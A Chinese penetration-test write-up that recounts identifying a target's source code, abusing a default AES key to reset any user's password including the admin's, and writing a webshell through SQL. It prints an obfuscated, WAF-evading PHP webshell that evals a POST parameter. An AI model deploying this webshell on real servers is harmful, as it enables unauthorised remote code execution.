文章总结： 本文介绍了渗透测试中的搜打撤战术，通过F12前端审查和信息收集识别源码特征。在代码审计中发现控制器使用默认AES密钥，导致可重置任意用户密码。随后登录后台尝试SQL写shell，针对WAF拦截利用字符拼接动态构造POST变量进行免杀，最终成功获取服务器权限。 综合评分： 75 文章分类： 渗透测试,代码审计,免杀,WEB安全

“搜打撤”在渗透测试中的运用

原创

kingman

kingman安全

2026年1月8日 18:53 江苏

声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。同时所有相关行为均已取得授权，未经作者同意禁止转载

游戏的套路：搜打撤

渗透的套路：信息收集->审0day->getshell

如下案例均有授权、未经授权严谨非法渗透

信息收集

做个会点鼠标的猴子就行

常规点点点、进页面就可以开始信息收集了

信息收集小技巧:通过F12对前端元素进行审查、查找觉得异常的点再放入搜索引擎收集，基本上靠特征能识别出源

于是乎靠着上述方法找到了对应的源码（厚码毕竟0day大家不要乱搞）

代码审计

大家都不爱看审计这就跳过流程吧

总之在控制器里找到了对应方法且用的是默认AES密钥加密

随后就可以重置任意用户密码，uid为1的就是管理员

接着登入后台

sql写shell

waf明显流量测拦了、上免杀

$chars = ['_', 'P', 'O', 'S', 'T'];$method = '';foreach($chars as $char) {    $method .= $char;}$keys = ['a', 'n', 't'];$param = implode('', $keys);$c = $$method;      $d = $c[$param];   ob_start();@eval(hex2bin(base64_encode($d)));ob_end_clean();

Getshell

爽文结束

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：kingman安全 kingman《“搜打撤”在渗透测试中的运用》